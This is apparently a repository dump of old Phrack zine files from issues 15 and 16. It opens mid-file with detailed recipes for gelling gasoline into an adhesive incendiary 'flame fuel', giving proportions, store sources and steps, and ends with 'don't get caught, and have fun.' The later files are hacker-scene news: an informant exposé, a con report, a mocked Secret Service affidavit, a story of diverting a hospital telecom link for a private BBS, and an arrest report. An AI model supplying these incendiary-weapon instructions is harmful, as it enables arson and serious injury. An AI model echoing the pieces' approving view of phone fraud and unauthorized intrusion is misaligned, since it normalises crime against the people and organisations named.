60 Gasoline Motor Fuel Gas station or motor vehicle
2 (flake) or Lye Drain cleaner, Food store or Drug store
1 (powder) making of soap
15 Rosin Manufacturing Paint store, chemical supply
Paint & Varnish house
or
Castor Oil Medicine Food and Drug stores
PROCEDURE
---------
______________________________________________________________________________
|CAUTION: Make sure that there are no open flames in the area when mixing |
|the flame fuel. NO SMOKING! |
|----------------------------------------------------------------------------|
1. Pour gasoline into jar, bottle or other container. (DO NOT USE AN ALUMINUM
CONTAINER.)
2. IF rosin is in cake form, crush into small pieces.
3. Add rosin or castor oil to the gasoline and stir for about five minutes to
mix thoroughly.
4. In a second container (NOT ALUMINUM) add lye to an equal volume of water
slowly with stirring.
______________________________________________________________________________
|CAUTION: Lye solution can burn skin and destroy clothing. If any is |
|spilled, wash away immediately with large quantities of water. |
|----------------------------------------------------------------------------|
5. Add lye solution to the gasoline mix and stir until mixture thickens (about
one minute).
NOTE: The sample will eventually thicken to a very firm paste. This can be
thinned, if desired, by stirring in additional gasoline.
Lye-Alcohol Systems
Lye (also know as caustic soda or Sodium Hydroxide) can be used in
combination with alcohol and any of several fats to gel gasoline for use as a
flame fuel.
MATERIALS REQUIRED:
------------------
Parts by Volume Ingredient How Used Common Source
--------------- ---------- -------- -------------
60 Gasoline Motor Fuel Gas station or motor vehicle
2 (flake) or Lye Drain cleaner, Food store or Drug store
1 (powder) making of soap
3 Ethyl Alcohol Whiskey Liquor store
Medicine Drug store
NOTE: Methyl (wood) alcohol or isopropyl (rubbing) alcohol can be substituted
for ethyl alcohol, but their use produces softer gels.
14 Tallow Food Fats rendered by cooking the
Making of soap meat or suet of animals.
NOTE: The following can be substituted for the tallow:
(a) Wool grease (Lanolin) (very good) -- Fat extracted from sheep wool
(b) Castor Oil (good)
(c) Any vegetable oil (corn, cottonseed, peanut, linseed, etc.)
(d) Any fish oil
(e) Butter or oleo margarine
It is necessary when using substitutes (c) to (e) to double the given amount
of fat and of lye for satisfactory body.
PROCEDURE
---------
______________________________________________________________________________
|CAUTION: Make sure that there are no open flames in the area when mixing |
|the flame fuel. NO SMOKING! |
|----------------------------------------------------------------------------|
1. Pour gasoline into jar, bottle or other container. (DO NOT USE AN ALUMINUM
CONTAINER.)
2. Add tallow (or substitute) to the gasoline and stir for about 1/2 minute to
dissolve fat.
3. Add alcohol to the gasoline mixture. Mix thoroughly.
4. In a separate container (NOT ALUMINUM) slowly add lye to an equal volume of
water. Mixture should be stirred constantly while adding lye.
______________________________________________________________________________
|CAUTION: Lye solution can burn skin and destroy clothing. If any is |
|spilled, wash away immediately with large quantities of water. |
|----------------------------------------------------------------------------|
5. Add lye solution to the gasoline mixture and stir occasionally until
thickened (about 1/2 hour)
NOTE: The sample will eventually (1 to 2 days) thicken to a very firm paste.
This can be thinned, if desired, by stirring in additional gasoline.
Soap-Alcohol System
Common household soap can be used in combination with alcohol to gel
gasoline for use as a flame fuel which will adhere to target surfaces.
MATERIALS REQUIRED:
------------------
Parts by Volume Ingredient How Used Common Source
--------------- ---------- -------- -------------
36 Gasoline Motor Fuel Gas station or motor vehicle
1 Ethyl Alcohol Whiskey Liquor store
Medicine Drug store
NOTE: Methyl (wood) alcohol or isopropyl (rubbing) alcohol can be substituted
for ethyl alcohol.
20 (powdered) or Laundry soap Washing clothes Stores
28 (flake)
NOTE: Unless the word "soap" actually appears somewhere on the container or
wrapper, a washing compound is probably a detergent. THESE CAN NOT BE USED.
PROCEDURE
---------
______________________________________________________________________________
|CAUTION: Make sure that there are no open flames in the area when mixing |
|the flame fuel. NO SMOKING! |
|----------------------------------------------------------------------------|
1. If bar soap is used, carve into thin flakes using a knife.
2. Pour Alcohol and gasoline into a jar, bottle or other container and mix
thoroughly.
3. Add soap powder or flakes to gasoline-alcohol mix and stir occasionally
until thickened (about 15 minutes).
Egg System
The white of any bird egg can be used to gel gasoline for use as a flame fuel.
MATERIALS REQUIRED:
------------------
Parts by Volume Ingredient How Used Common Source
--------------- ---------- -------- -------------
85 Gasoline Motor Fuel Gas station or motor vehicle
14 Egg Whites Food Food store, farms
Any one of the following
1 Table Salt Food, industrial Sea Water, Natural brine,
processes Food stores
3 Ground Coffee Food Food store
3 Dried Tea Food Food store
Leaves
3 Cocoa Food Food store
2 Sugar Food Food store
1 Saltpeter Pyrotechnics Drug store
(Niter) Explosives chemical supply store
(Potassium Matches
Nitrate) Medicine
1 Epsom salts Medicine Drug store, food store
industrial
processes
2 Washing soda Washing cleaner Food store
(Sal soda) Medicine Drug store
Photography Photo supply store
1 1/2 Baking soda Baking Food store
Manufacturing: Drug store
Beverages,
Mineral waters,
and Medicine
1 1/2 Aspirin Medicine Drug store
Food store
PROCEDURE
---------
______________________________________________________________________________
|CAUTION: Make sure that there are no open flames in the area when mixing |
|the flame fuel. NO SMOKING! |
|----------------------------------------------------------------------------|
1. Separate egg white from yolk. This can be done by breaking the egg into a
dish and carefully removing the yolk with a spoon.
______________________________________________________________________________
|NOTE: DO NOT GET THE YELLOW EGG YOLK MIXED INTO THE EGG WHITE. If egg yolk|
|gets into the egg white, discard the egg. |
|----------------------------------------------------------------------------|
2. Pour egg white into a jar, bottle, or other container and add gasoline.
3. Add the salt (or other additive) to the mixture and stir occasionally until
gel forms (about 5 to 10 minutes).
NOTE: A thicker flame fuel can be obtained by putting the capped jar in hot
(65 C) water for about 1/2 hour and then letting them cool to room
temperature. (DO NOT HEAT THE GELLED FUEL CONTAINING COFFEE).
Wax System
Any of several common waxes can be used to gel gasoline for use as a
flame fuel.
MATERIALS REQUIRED:
------------------
Parts by Volume Ingredient How Used Common Source
--------------- ---------- -------- -------------
80 Gasoline Motor Fuel Gas station or motor vehicle
20 Wax Leather polish, Food store, drug store,
(Ozocerite, sealing wax, department store
Mineral wax, candles,
fossil wax, waxed paper,
ceresin wax furniture &
beeswax) floor waxes,
lithographing.
PROCEDURE
---------
1. Melt the wax and pour into jar or bottle which has been placed in a hot
water bath.
2. Add gasoline to the bottle.
3. When wax has completely dissolved in the gasoline, allow the water bath to
cool slowly to room temperature.
NOTE: If a gel does not form, add additional wax (up to 40% by volume) and
repeat the above steps. If no gel forms with 40% wax, make a Lye solution by
dissolving a small amount of Lye (Sodium Hydroxide) in an equal amount of
water. Add this solution (1/2% by volume) to the gasoline wax mix and shake
bottle until a gel forms.
Well, that's it, I omitted a few things because they where either redundant,
or more aimed toward battle field conditions. Be careful, don't get caught,
and have fun...
Elric of Imrryr

336
phrack15/6.txt Normal file
View file

@ -0,0 +1,336 @@
PWN ^*^ PWN ^*^ PWN { Final Issue } PWN ^*^ PWN ^*^ PWN
^*^ ^*^
PWN Phrack World News PWN
^*^ Issue XV: Part One ^*^
PWN PWN
^*^ Created, Written, and Edited ^*^
PWN by Knight Lightning PWN
^*^ ^*^
PWN ^*^ PWN ^*^ PWN { Final Issue } PWN ^*^ PWN ^*^ PWN
Welcome to my final issue of Phrack World News. Many people are wondering why
I am giving it up. There are several reasons, but the most important is that
I will be going to college and will have little (if any) time for the
phreak/hack world or PWN. I doubt I will even be calling any bulletin boards,
but I may make an occasional call to a few of my friends in the community.
The Phrack Inc. VMS is no longer in service and messages will not be received
there by anyone. Phrack Inc. is now in the hands of Sir Francis Drake, Elric
Of Imrryr, and Shooting Shark.
:Knight Lightning
______________________________________________________________________________
Dan The Operator; Informant July 27, 1986
~~~~~~~~~~~~~~~~~~~~~~~~~~~
I'm going to assume that all of you have read PWN 14/2 and the details
surrounding SummerCon '87.
This article will feature information collected from our investigation and
quotes from the Noah Tape.
The tape actually has two parts. The front side has part of an Alliance
Teleconference in which Noah attempted to gather information by engineering
hackers. Side B contains 45 minutes of a conversation between Noah and John
Maxfield of BoardScan, in which Noah tried to engineer Maxfield into giving
him information on certain hackers by trading him information on other
hackers. All of this has been going on for a long time although we are unsure
as to how long and Noah was not exactly an informant for Maxfield, it was the
FBI.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Part One: Noah Engineers his "friends"
The Alliance teleconference recording has about 7 people on it, but the only
people I recognized were Dan The Operator, Il Duce (Fiber Optic), Johnny
Rotten, and The Ninja.
The topics discussed (mostly by Noah) included;
Bill From RNOC / Catch-22 / Doom Prophet / Force Hackers / John Maxfield
Karl Marx / Legion of Doom / Lord Rebel / Neba / Phantom Phreaker
Phucked Agent 04 / Silver Spy / SummerCon '87 / The Rebel / The Videosmith
Here is a look at some of the conversation; [Il Duce=Mark]
------------------------------------------------------------------------------
Noah: SILVER SPY, you know him?
Mark: Yeah, what about him?
Noah: Yeah, Paul.
[This was done to make it look like Noah knew him and was his buddy.-KL]
------------------------------------------------------------------------------
Noah: Anyway, is LORD REBEL part of LOD?
Mark: He's not really.
Noah: I didn't think so.
Mark: Well, he is, he is sort of.
Noah: Ah, well what does he know.
Mark: Not much.
Noah: Why do they care about him, he's just a pirate.
[Look at this dork! First he tries to act like he knows everything and then
when he realizes he screwed up, he tries to insult LORD REBEL's abilities.-KL]
------------------------------------------------------------------------------
Noah: Who else is part of LOD that I missed?
Mark: I don't know who you would have heard of.
Noah: I've pretty much heard of everyone, I just can't think of anyone else.
[Yeah Noah, you are a regular best friend with everyone in LOD.-KL]
------------------------------------------------------------------------------
Noah: Want to give out LORD REBEL's number?
Mark: Everybody knows it already.
Noah: What is it?
Mark: Which one?
Noah: Both, all.
Mark: Want do you want to know for, don't you have it?
Noah: Never bothered getting them. What do you got? Mark!
Mark: Yeah.
Noah: Do you have his number?
Mark: Yeah.
Noah: Well, what is it!?
Mark: Why should I say?
Noah: I dunno, you say everyone's got it.
Mark: Yeah, so.
Noah: So if everyone has it, you might as well give it to everybody.
Mark: Not really, I wouldn't want to be the one to tell him that I gave out
his number.
Noah: Ok Mark, fine, it's no problem for me to get anyone's number. I got
VIDEOSMITH's and SILVER SPY's, no problem. [Yeah right, see the other
conversation with John Maxfield.-KL]
------------------------------------------------------------------------------
Noah: CATCH-22 is supposed to be the most elite BBS in the United States.
What do you think about that Mark?
Mark: What?
Noah: What do you think about that Mark?
Mark: About what?
Noah: About CATCH-22.
Mark: What about it?
Noah: (pause) Well.
Mark: Its not the greatest board because it's not really that active.
Noah: Right, but what do you think about it? Alright, first off here, first
off, first off, do you have KARL MARX's number?
Mark: What?
Noah: I doubt you have KARL MARX's phone number.
Mark: Ask me if I really care.
Noah: I'm just wondering if YOU DO.
Mark: It's one thing to have all these people's numbers, it's another if you
are welcome to call them.
Noah: Yeah (pause), well are you?
Mark: Why should I say?
Noah: I dunno, I dunno. I'm probably going to ask him anyways.
[I don't think my ragging is even necessary in this excerpt.-KL]
------------------------------------------------------------------------------
Noah: Here is what MAXFIELD says, "You got the hackers, and then you got the
people who want to make money off the hackers." Information shouldn't
be free, you should find out things on your own.
[Give me a break Noah, you are the BIGGEST leach I have ever seen -KL]
------------------------------------------------------------------------------
One final note to make about the Alliance conversations is that halfway
through, IL DUCE and DAN THE OPERATOR gave out BILL FROM RNOC's full name,
phone number, address, etc.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Part Two: Noah Engineers John Maxfield
The list of topics discussed in this conversation is much longer;
Arthur Dent / Ben Casey / Big Brother / Bill From RNOC / BoardScan
Captain Crunch / Celtic Phrost / Cheshire Catalyst / Doc Holiday / Easywriter
Genghis Khan / Jenny Jaguar / Jester Sluggo / Karl Marx / Kerrang Khan
Kloey Detect / Max Files / Noah Espert / Legion Of Doom / Legion of Hackers
Lord Digital / Lord Rebel / Mark Tabas / Oryan QUEST / Phucked Agent 04
Phrack Inc. / Pirate's Hangout / Septic Tank / Sigmund Fraud / The Disk Jockey
The Executioner / The Federation / The *414* Wizard / The Hobbit
The Marauder The Safecracker / The Telecom Security Group / The Videosmith
The Weasel / Tommy Hawk / Torture Chamber / Twilight Zone / Tuc
Violet Boregard / Zepplin
The following are the highlights of the conversation between DAN THE OPERATOR
and JOHN MAXFIELD. [John Maxfield = John]
------------------------------------------------------------------------------
Noah: Did you ever find VIDEOSMITH's number?
John: No, matter of fact. You know what it is, I've been on boards he's been
on in the 215 NPA [possibly Atlantis], but well.
Noah: But you don't have his number?
John: Should I?
Noah: He's fairly big, he knows his stuff. I would think he'd be worth
getting a number for.
John: Doesn't do anything for me because you know, just having his number
doesn't get him in trouble or anything.
Noah: Oh, well I don't want him to get in trouble...he's a nice person. So
do you have LORD REBEL's phone number?
John: What do you know about him?
Noah: I think he's up in New York.
John: 914?
Noah: Possibly 718, 212, possibly even 201. [Excuse me you dork. The 201 NPA
is in the state of New Jersey not New York. What a loser Noah is. -KL]
John: If you don't have a number on him I'll have to do an alphabetical
search for him. It takes a while.
Noah: Well we could talk while it's going. I think you're pretty
interesting, you're not boring like I am.
John: Well you're not boring to me as long as I keep getting people's phone
numbers. Bahahahahahahahahah Har har har.
Noah: (Pause)(Pause)(Pause) Bahahahahahahaha. Sheesh.
John: Well let's see what it finds, there's a lot of Lords in there.
Noah: He's part of LOD.
John: Oh he's part of LOD!?
Noah: Yeah.
John: Well I might have him and I might not [What a profound statement -KL].
Noah: He's not very active in LOD.
[The search for LORD REBEL's information was a failure -KL]
------------------------------------------------------------------------------
Noah: I got a question, I'm still trying to figure this out. Are there
people like me who just call you up like this?
John: Yes there are.
Noah: A lot?
John: Enough. You know it's funny, there's people that call up and there
assholes and I'll just hang up on them. There is other people that
call up and well you know they try to feed me bullshit, but at least
they aren't being jerks about it.
Noah: You think I'm feeding you bullshit?
John: I dunno, maybe you are or maybe you aren't. What I'm saying is that
there are people that behave like humans. So there are a few that call
in.
You know when you're working with informants, you got different
categories. You got informants you can trust and you got informants
that well hold on a second. There are some informants, that they could
tell me anything and I'd believe them. Ok, because I know them. Met
them personally maybe or known the guy for 3 or 4 years, his
information is always correct that sort of thing.
Then there is somebody like you that umm is kinda maybe a "Class 2
Informant." Gives valid phone numbers and information out, but is not
really a true informant. Then there is a "Class 3 Informant" that's
like, ahh somebody like ORYAN QUEST who calls up and turns in somebody
he doesn't like, but that's all he ever does. I don't know if you can
call them Class 1, Class 2, Class 3 exactly but that's how I look at
it.
[Shortly after this, Maxfield gave out JESTER SLUGGO's information -KL]
------------------------------------------------------------------------------
Noah: How about Phucked Agent 04?
John: Oh him, his name is XXXXX and he's out in XXXXXXX.
Noah: Something like that.
John: He's one of the jerks that made death threats against me. I kinda
would like to get him.
Noah: You want his number?
John: Yeah.
Noah: Lemme see if I can catch up with him, I know a few people in LOD.
------------------------------------------------------------------------------
[Noah tried to get information on KERRANG KHAN for a while and then started
asking about KARL MARX -KL]
Noah: Ok, KARL MARX.
John: Oh, he got busted along with MARK TABAS you know, I told you all about
that.
Noah: Yeah yeah.
John: He lives out in NPA XXX, but he was going to college in XXXXXXXXXX and
I don't have a number for him there.
Noah: He's probably back home now.
John: Yeah, but I probably shouldn't give out his number. He did get popped.
Noah: Aw come on.
John: Nah.
Noah: Come on.
John: Nah.
Noah: Please.
John: Nah. I probably don't have a correct number anyway.
Noah: Dude. Well if you don't have a correct number then give me the old
number.
John: Nah.
Noah: C'mon dude.
John: Nah.
Noah: Dude!
John: Nah nah. Besides I have a feeling that he wouldn't appreciate being
called up by hackers anyway.
Noah: He's still around though!
John: Is he!?
Noah: Yes.
John: Oh really.
Noah: Yes sir. Because he was talking with THE MARAUDER, you know, Todd.
John: Yeah?
Noah: Yeah.
John: That's interesting.
[They went on to discuss THE SAFECRAKER, THE SEPTIC TANK, THE TWILIGHT ZONE,
TORTURE CHAMBER, and THE FEDERATION. Maxfield reveled that he had been on
TWILIGHT ZONE back when THE MARAUDER used to run it. -KL]
------------------------------------------------------------------------------
Noah: THE MARAUDER is still home, he didn't go to college.
John: Yeah, MARAUDER, now he is heavy duty.
Noah: Yeah, he knows his snit (not a typo). However, he doesn't brag about
it.
John: Well the thing is, you know is what the hell is he trying to
accomplish? I sometimes kinda wonder what motivates somebody like that.
Noah: What do you mean?
John: Well he wants to screw around with all this stuff, but what's the
point?
------------------------------------------------------------------------------
SIGMUND FRAUD, MAX FILES, TOMMY HAWK, TUC, PHRACK INC., MARK TABAS, were next
to be discussed. After which MAXFIELD went on to retell a story about a
district attorney in California that referred to him as a legend in his own
time. Noah then started asking about CAPTAIN CRUNCH and Easywriter, and
Maxfield told him the story of CAPTAIN CRUNCH's latest bust.
------------------------------------------------------------------------------
THE DISK JOCKEY, DOC HOLIDAY, THE MARAUDER, BIG BROTHER, ARTHUR DENT, THE
WEASEL, BILL FROM RNOC, THE 414 WIZARD, THE EXECUTIONER, and LORD DIGITAL were
next.
Then it was Noah's turn to unload (although Noah had already given out
information on many of the previously mentioned people).
TUC, THE TELECOM SECURITY GROUP, CELTIC PHROST, ZEPPLIN, and GENGHIS KHAN had
their information handed out freely.
John: I guess I'm going to have the goons come over and pay you a visit.
Noah: Who me?
John: Take your computer, clean your room for you.
Noah: No, no, please... don't... you can't do that. I'll be an informant
dammit. I'll give you all my files, I'll send them immediately...
Federal Express.
John: Sounds good.
Noah: Has anyone ever really done that?
John: Well not by Federal Express.
Noah: I'll send you all my manuals, everything. I'll even tell you my
favorite Sprint code.
John: Sprint would appreciate that. You know, it's interesting that you know
MARAUDER.
Noah: Todd and I, yeah, well we're on a first name basis. [Yeah you know his
first name but that's as far as it goes, isn't it Noah. -KL]
------------------------------------------------------------------------------
Noah gave out more people's information and the conversation ran on for
another 20 minutes. The problem is that this is when the tape ran out, but
the conversation was going strong. Noah was giving out numbers alphabetically
and he was still in the C-G area when the tape ran out. There is no telling
as to what was discussed next.
All of the people mentioned at the beginning were discussed in depth and the
excerpts shown here do not necessarily show the extent of the discussion. I
didn't transcript the entire conversation because in doing so would publicly
release information that would be unproductive to our society.
So, many of you are probably still asking yourself, where did we get the FBI
connection from? Well, some time ago, DAN THE OPERATOR used to hang out with
THE TRADER and they were into some kind of stock fraud using Bank Americard or
something along those lines. Something went wrong and Noah was visited by the
FBI. As it turns out, Noah became their informant and they dropped the
charges.
Sometime later, Noah tried to set up TERMINUS (see the current Phrack
Pro-Phile) to meet (unknowingly) with the FBI and give them a tour of his
board, TERMINUS realized what was going on and Noah's plans were ruined.
I hope you learned from this story, don't let yourself be maneuvered by people
like Noah. There are more informants out there than you think.
Written by Knight Lightning
For more information about DAN THE OPERATOR, you should read THE SYNDICATE
REPORTS Transmittal No. 13 by THE SENSEI. Available on finer BBSes/AEs
everywhere.
______________________________________________________________________________

45
phrack15/7.txt Normal file
View file

@ -0,0 +1,45 @@
PartyCon '87 July 24-26, 1987
~~~~~~~~~~~~
This article is not meant to be as in depth as the SummerCon issue, but I
think you'll enjoy it.
Before we begin, here is a list of the total phreak/hack attendees;
Cheap Shades / Control C / Forest Ranger / Knight Lightning / Loki
Lucifer 666 / Mad Hatter / Sir William / Synthetic Slug / Taran King
The Cutthroat / The Disk Jockey / The Mad Hacker
Other people who attended that should be made a note of include; Dan and Jeff
(Two of Control C's roommates that were pretty cool), Dennis (The Menace); one
of Control C's neighbors, Connie; The Mad Hacker's girlfriend (at the time
anyway), and the United States Secret Service; they weren't actually at
PartyCon, but they kept a close watch from a distance.
For me, it started Friday morning when Cheap Shades and I met Forest Ranger
and Taran King at Taran's house. Our trip took us through Illinois, and we
stopped off at a Burger King in Normal, Illinois (close to Illinois State
University). Would you believe that the majority of the population there had
no teeth?
Anyway, our next stop was to see Lucifer 666 in his small one-horse town. He
would follow us later (with Synthetic Slug). We arrived at Control C's
apartment around 4 PM and found Mad Hatter alone. The first thing he made a
note of was some sheets of paper he discovered (while searching ^C's
apartment). I won't go into what was on the paper. Although we didn't know
it at the time, he copied the papers and hid them in his bag. It is believed
that he intended to plant this and other information inside the apartment so
that ^C would get busted.
Basically, it was a major party with a few mishaps like Forest Ranger and
Cheap Shades driving into Grand Rapids, Michigan on Friday night and not
getting back till 4 AM Saturday. We hit Lake Shore Drive, the beach, a few
shopping malls, Chicago's Hard Rock Cafe, and Rush Street. It was a lot of
fun and we may do it again sometime soon.
If you missed PartyCon '87, you missed out. For those who wanted to go, but
couldn't find us, we're sorry. Hotel cancellations and loss of phone lists
due to current problems made it impossible for us to contact everyone.
Written by Knight Lightning
______________________________________________________________________________

137
phrack15/8.txt Normal file
View file

@ -0,0 +1,137 @@
#### PHRACK PRESENTS ISSUE 15 ####
^*^*^*^Phrack World News, Part 1^*^*^*^
**** File 8 of 10 ****
SEARCH WARRANT ON WRITTEN AFFIDAVIT
DATE: 7/17/87
TO: Special Agent Lewis F. Jackson II, U.S. Secret Service or any agent d use
of access devices, and Title 18 USC 1030 - Computer related fraud.
WHEN: On or before (10 days) at any time day or night
------------
AFFIDAVIT
"I, Lewis F. Jackson II, first being duly sworn, do depose and state:..."
[Here he goes on and on about his position in the San Jose Secret Service,
classes he has taken (none of them having to do with computers)]
"Other individuals involved in the investigation:
Detective J. McMullen - Stanford Public Safety/Specialist in computers
Steve Daugherty - Pacific Bell Telephone (sic)/ Specialist in fraud
Stephen Hansen - Stanford Electrical Eng./ Director
Brian Bales - Sprint Telecom./ Security Investigator
M. Locker - ITT Communications/ Security Investigator
Jerry Slaughter - MCI Communications/Security Investigator
4. On 11/14/86, I met with Detective Sgt. John McMullen, who related the
following:
a. Beginning on or about 9/1/86, an unknown suspect or group of
suspects using the code name Pink Floyd repeatedly accessed the Unix and
Portia computer systems at Stanford University without authorization.
b. The suspects initially managed to decode the password of a computer
user called "Laurent" and used the account without the permission or knowledge
of the account holder. The true account holder was given a new account
and a program was set up to print out all activity on the "Laurent" account.
c & d. Mentions the systems that were accessed illegally, the most
'dangerous' being Arpanet (geeeee).
e. Damage was estimated at $10,000 by Director of Stanford Computers.
g. On 1/13/87, the suspect(s) resumed regular break-ins to the
"Laurent" account, however traps and traces were initially unsuccessful in
identifying the suspect(s) because the suspect(s) dialed into the Stanford
Computer System via Sprint or MCI lines, which did not have immediate trap and
trace capabilities.
6. On 2/19/87 I forwarded the details of my investigation and a request for
collateral investigation to the New York Field Office of The U.S. Secret
Service. (The USSS [I could say something dumb about USSR here]). SA Walter
Burns was assigned the investigation.
7. SA Burns reported telephonically that comparison of the times at which
Stanford suffered break ins [aahhh, poor Stanford] with that of DNR's on
suspects in New York, Pennsylvania, Massachusetts, Maryland and California
showed a correlation.
8. [Some stuff about Oryan QUEST engineering Cosmos numbers].
9. On 4/2/87, I was telephoned again by Mr. Daugherty who reported that on
4/1/87, while checking a trouble signal on the above DNR's [on Oryan's lines],
he overheard a call between the central figure in the New York investigation
and [Oryan Quest's real name.] Mr. Daughtery was able to identify and
distinguish between the three suspects because they addressed each other by
there first name. During the conversation, [Oryan Quest] acknowledged being
a member of L.O.D. (Legion Of Doom), a very private and exclusive group of
computer hackers. [Oryan QUEST never was a member.]
10. [Mr. Daughtery continued to listen while QUEST tried to engineer some
stuff. Gee what a coincidence that a security investigator was investigating
a technical problem at the same time a conversation with 2 of the suspects was
happening, and perhaps he just COULDN'T disconnect and so had to listen in for
20 minutes or so. What luck.]
11. SA Burns reported that the suspects in New York regularly called the
suspects in California.
14. From 4/30/87 to 6/15/87 DNR's were on both California suspects and were
monitored by me.
[The data from the DNR's was 'analyzed' and sent to Sprint, MCI, and ITT to
check on codes. Damages claimed by the various LDX's were:
SPRINT : Oryan QUEST : 3 codes for losses totaling $4,694.72
Mark Of CA : 2 codes for losses totaling $1,912.57
ITT : Mark Of CA : 4 codes for losses totaling $639
MCI : Mark Of CA : 1 code for losses totaling $1,813.62
And the winner is....Oryan QUEST at $4,694.72 against Mark with $4,365.19.]
20. Through my training and investigation I have learned that people who
break into computers ("hackers") and people who fraudulently obtain
telecommunications services ("freakers") are a highly sophisticated and close
knit group. They routinely communicate with each other directly or through
electronic bulletin boards.
[Note: When a Phrack reporter called Lewis Jackson and asked why after
his no doubt extensive training he didn't spell "freakers" correctly with a
'ph' he reacted rather rudely.]
21.
22. [Jackson's in depth analysis of what hackers have ("Blue Boxes are
23. normally made from pocket calculators...") and their behavior]
24.
26. Through my training and investigations, I have learned that evidence
stored in computers, floppy disks, and speed dialers is very fragile and can
be destroyed in a matter of seconds by several methods including but not
limited to: striking one or more keys on the computer keyboard to trigger a
preset computer program to delete information stored within, passing a strong
magnetic source in close proximity to a computer, throwing a light switch
designed to either trigger a preset program or cut power in order to delete
information stored in a computer or speed dialer or computer; or simply
delivering a sharp blow to the computer. [Blunt blows don't cut it.]
27. Because of the ease with which evidence stored in computers can be
destroyed or transferred, it is essential that search warrants be executed at
a time when the suspect is least likely to be physically operating the target
computer system and least likely to have access to methods of destroying or
transferring evidence stored within the system. Because of the rapidity of
modern communications and the ability to destroy or transfer evidence remotely
by one computer to another, it is also essential that in cases involving
multiple suspects, all search warrants must be executed simultaneously.

40
phrack16/1.txt Normal file
View file

@ -0,0 +1,40 @@
===== Phrack Magazine presents Phrack 16 =====
===== File 1 of 12 : Phrack 16 Intro =====
Greetings, and welcome to Phrack #16, we are a bit late, but bigger
then ever. I think you will find this issue very interesting.
Enjoy and have Phun
Elric of Imrryr - Editor
Contents this issue:
16.1 Phrack 16 Intro by Elric of Imrryr 2K
16.2 BELLCORE Information by The Mad Phone-Man 11K
16.3 A Hacker's Guide to Primos: Part 1 by Cosmos Kid 11K
16.4 Hacking GTN by The Kurgan 7K
16.5 Credit Card Laws Laws by Tom Brokow 7K
16.6 Tapping Telephone Lines by Agent Steal 9K
16.7 Reading Trans-Union Credit Reports by The Disk Jockey 6K
Phrack World News:
16.8 The Story Of the West German Hackers by Shooting Shark 3K
16.9 The Mad Phone-Man and the Gestapo by The Mad Phone-Man 2K
16.10 Flight of the Mad Phone-Man by The Mad Phone-Man 2K
16.11 Shadow Hawk Busted Again by Shooting Shark 2K
16.12 Coin Box Thief Wanted by The $muggler 2K
Submission to Phrack may be sent to the following BBSes:
Unlimited Reality 313-489-0747 Phrack
The Free World 301-668-7657 Phrack Inc. (*)
The Executive Inn 915-581-5145 Phrack
Lunatic Labs UnLtd. 415-278-7421 Phrack (*)
House of the Rising Sun 401-789-1809 Phrack
* You will get the quickest reply from these systems.

40
phrack16/10.txt Normal file
View file

@ -0,0 +1,40 @@
#### PHRACK PRESENTS ISSUE 16 ####
^*^*^*^Phrack World News, Part 3^*^*^*^
**** File 10 of 12 ****
[Ed's Note: Certain names have been change in the article to protect the
author]
The Flight of The Mad Phone-Man's BBS to a Friendly Foreign Country
Using my knowledge that the pigs grab your computer when they bust
you,I got real worried about losing a BIG investment I've got in my IBM. I
decide there's a better way.... Move it! But where? Where's safe from the
PhBI? Well in the old days, to escape the draft, you went to Canada, why not
expatriate my board.... Well the costs of a line are very high, let's see
what's available elsewhere.
One afternoon, I'm working at a local hospital,(one I do telecom work
for) and I ask the comm mgr if they have any links to Canada? He says why
yes, we have an inter-medical link over a 23ghz microwave into the city just
across the border. I ask to see the equipment. WOW! My dreams come true,
it's a D4 bank (Rockwell) and it's only got 4 channel cards in it. Now, being
a "nice" guy, I offer to do maintenance on this equipment if he would let me
put up another channel...he agrees. The plot thickens.
I've got a satellite office for a business near the hospital on the
other side, I quickly call up good ole Bell Canada, and have them run a 2 wire
line from the equipment room to my office. Now the only thing to get is a
couple of cards to plug into the MUX to put me on the air.
A 2 wire E&M card goes for bout $319, and I'd need two. Ilook around
the state, and find one bad one in Rochester.... I'm on my way that afternoon
via motorcycle. The card is mine, and the only thing I can find wrong is a
bad voltage regulator. I stop by the Rockwell office in suburban Rochester
and exchange the card, while I'm there, I buy a second one (Yeah, on my card)
and drive home.... by 9pm that night the circuit is up, and we are on the air.
Results- Very good line, no noise, can be converted with another card
for a modest fee if I want the bandwidth. So that's the story of how the
board went to a "friendly foreign country."
The Mad Phone-Man

53
phrack16/11.txt Normal file
View file

@ -0,0 +1,53 @@
#### PHRACK PRESENTS ISSUE 16 ####
^*^*^*^Phrack World News, Part 4^*^*^*^
**** File 11 of 12 ****
Shadow Hawk Busted Again
========================
As many of you know, Shadow Hawk (a/k/a Shadow Hawk 1) had his home
searched by agents of the FBI, Secret Service, and the Defense Criminal
Investigative Services and had some of his property confiscated by them on
September 4th. We're not going to reprint the Washington Post article as it's
available through other sources. Instead, a summary:
In early July, SH bought an AT&T 3B1 ("Unix PC") with a 67MB drive for
a dirt-cheap $525. He got Sys V 3.5 for another $200 but was dissatisfied
with much of the software they gave him (e.g. they gave him uucp version 1.1).
When he was tagged by the feds, he had been downloading software (in
the form of C sources) from various AT&T systems. According to reports, these
included the Bell Labs installations at Naperville, Illinois and Murray Hill,
New Jersey. Prosecutors said he also gained entry to (and downloaded software
from) AT&T systems at a NATO installation in Burlington, North Carolina and
Robins AFB in Georgia. AT&T claims he stole $1 million worth of software.
Some of it was unreleased software taken from the Bell Labs systems that was
given hypothetical price tags by Bell Labs spokespersons. Agents took his
3B1, two Atari STs he had in his room, and several diskettes.
SH is 17 and apparently will be treated as a minor. At the time of
this writing, he will either be subject to federal prosecution for 'computer
theft' or will be subject to prosecution only by the State of Illinois.
SH's lawyer, Karen Plant, was quoted as saying that SH "categorically
denies doing anything that he should not have been doing" and that he "had
absolutely no sinister motives in terms of stealing property." As we said, he
was just collecting software for his new Unix PC. When I talked to Ms. Plant
on September 25th, she told me that she had no idea if or when the U.S.
Attorney would prosecute. Karen Plant can be reached at (312) 263-1355. Her
address is 134 North LaSalle, #306, Chicago, Illinois.
---------
On July 9th SH wrote:
So you see, I'm screwed. Oh yeah, even worse! In my infinite (wisdom
|| stupidity, take your pick 8-)) I set up a local AT&T owned 7300 to call me
up and send me their uucp files (my uucp works ok for receive) and guess what.
I don't think I've to elaborate further on THAT one... (holding my breath, so
to type)
(_>Sh<_
---

40
phrack16/12.txt Normal file
View file

@ -0,0 +1,40 @@
